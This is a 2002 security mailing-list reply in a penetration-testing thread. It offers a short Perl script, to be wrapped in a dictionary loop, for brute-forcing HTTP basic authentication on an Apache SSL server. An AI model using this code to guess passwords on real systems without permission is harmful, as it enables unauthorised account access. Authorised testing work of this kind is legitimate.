Re: PEN Testing a everchanging realm in apache

From: Vladimir Parkhaev (vladimirat_private)
Date: Wed May 29 2002 - 15:10:56 PDT

    Quoting John_Leitchat_private (John_Leitchat_private):
    > Using the latest apache / ssl.
    >
    > I need to find a way of brute forcing the auth but........ the web server
    > has an ever changing realm.
    >
    > Is this possible or shall I look elsewhere ?
    >
    > Regards

    I am not sure what do you mean by "ever changing realm", but you can adapt the following
    perl code to brute force your way in. You need to install Crypt::SSLeay module,
    dictionary, a loop and ... pretty much it...

    #!/usr/bin/perl -w
    use LWP::UserAgent;

    my $ua  = LWP::UserAgent->new;
    my $req = HTTP::Request->new(POST => 'https://server.domain.com/');
    $req->authorization_basic('foo', 'bar');
    $res = $ua->request($req);
    ($res->is_success)?  print $res->content, "\n" : print $res->status_line, "\n";

    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/